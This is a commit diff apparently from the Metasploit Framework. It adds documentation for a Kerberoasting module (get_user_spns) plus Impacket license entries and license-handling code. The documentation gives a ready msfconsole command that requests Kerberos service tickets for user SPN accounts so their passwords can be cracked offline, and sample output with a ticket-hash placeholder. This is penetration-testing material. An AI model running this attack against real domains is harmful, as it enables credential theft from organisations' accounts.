Add get_user_spns external module and documentation

LICENSE

@@ -603,6 +603,54 @@ License: Artistic
  DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE, EVEN IF
  ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 
+License: Apache
+ Version 1.1, 2000
+ Modifications by CORE Security Technologies
+ .
+ Copyright (c) 2000 The Apache Software Foundation.  All rights
+ reserved.
+ .
+ Redistribution and use in source and binary forms, with or without
+ modification, are permitted provided that the following conditions
+ are met:
+ .
+ 1. Redistributions of source code must retain the above copyright
+    notice, this list of conditions and the following disclaimer.
+ .
+ 2. Redistributions in binary form must reproduce the above copyright
+    notice, this list of conditions and the following disclaimer in
+    the documentation and/or other materials provided with the
+    distribution.
+ .
+ 3. The end-user documentation included with the redistribution,
+    if any, must include the following acknowledgment:
+       "This product includes software developed by
+        CORE Security Technologies (http://www.coresecurity.com/)."
+    Alternately, this acknowledgment may appear in the software itself,
+    if and wherever such third-party acknowledgments normally appear.
+ .
+ 4. The names "Impacket" and "CORE Security Technologies" must
+    not be used to endorse or promote products derived from this
+    software without prior written permission. For written
+    permission, please contact oss@coresecurity.com.
+ .
+ 5. Products derived from this software may not be called "Impacket",
+    nor may "Impacket" appear in their name, without prior written
+    permission of CORE Security Technologies.
+ .
+ THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
+ WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
+ OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+ DISCLAIMED.  IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
+ ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+ LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
+ USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+ OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
+ OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ SUCH DAMAGE.
+
 License: Apache
  Version 2.0, January 2004
  http://www.apache.org/licenses/

documentation/modules/auxiliary/gather/get_user_spns.md

@@ -0,0 +1,28 @@
+## Description
+
+This module will try to find Service Principal Names (SPN) that are associated with normal user accounts on the specified domain and then submit requests to retrive Ticket Granting Service (TGS) tickets for those accounts, which may be partially encrypted with the SPNs NTLM hash. After retrieving the TGS tickets, offline brute forcing attacks can be performed to retrieve the passwords for the SPN accounts.
+
+## Verification Steps
+
+- [ ] Install [impacket](https://github.com/CoreSecurity/impacket) library with requirements
+- [ ] Have a domain user account credentials
+- [ ] `./msfconsole -q -x 'use auxiliary/gather/get_user_spns; set rhosts <dc-ip> ; set smbuser <user> ; set smbpass <password> ; set smbdomain <domain> ; run'`
+- [ ] Get Hashes
+
+## Scenarios
+
+```
+$ ./msfconsole -q -x 'use auxiliary/gather/get_user_spns; set rhosts <dc-ip> ; set smbuser <user> ; set smbpass <password> ; set smbdomain <domain> ; run'
+rhosts => <dc-ip>
+smbuser => <user>
+smbpass => <password>
+smbdomain => <domain>
+[*] Running for <domain>...
+[*] Total of records returned <num>
+[+] ServicePrincipalName                              Name        MemberOf                                                                          PasswordLastSet      LastLogon           
+[+] ------------------------------------------------  ----------  --------------------------------------------------------------------------------  -------------------  -------------------
+[+] SPN...              User...   List...  DateTime... Time... 
+[+] $krb5tgs$23$*user$realm$test/spn*$<data>
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

lib/msf/core/constants.rb

@@ -132,13 +132,16 @@ module Match
 MSF_LICENSE      = "Metasploit Framework License (BSD)"
 GPL_LICENSE      = "GNU Public License v2.0"
 BSD_LICENSE      = "BSD License"
+# Location: https://github.com/CoreSecurity/impacket/blob/1dba4c20e0d47ec614521e251d072116f75f3ef8/LICENSE
+CORE_LICENSE     = "CORE Security License (Apache 1.1)"
 ARTISTIC_LICENSE = "Perl Artistic License"
 UNKNOWN_LICENSE  = "Unknown License"
 LICENSES         =
   [
     MSF_LICENSE,
     GPL_LICENSE,
     BSD_LICENSE,
+    CORE_LICENSE,
     ARTISTIC_LICENSE,
     UNKNOWN_LICENSE
   ]

lib/msf/core/modules/external/shim.rb

@@ -37,6 +37,7 @@ def self.mod_meta_common(mod, meta = {}, drop_rhost: false)
     meta[:name]        = mod.meta['name'].dump
     meta[:description] = mod.meta['description'].dump
     meta[:authors]     = mod.meta['authors'].map(&:dump).join(",\n          ")
+    meta[:license]     = mod.meta['license'].nil? ? 'MSF_LICENSE' : mod.meta['license']
 
     options = if drop_rhost
       mod.meta['options'].reject {|n, o| n == 'rhost'}

lib/msf/core/modules/external/templates/common_metadata.erb

@@ -4,4 +4,4 @@
         [
           <%= meta[:authors] %>
         ],
-      'License'     => MSF_LICENSE,
+      'License'     => <%= meta[:license] %>,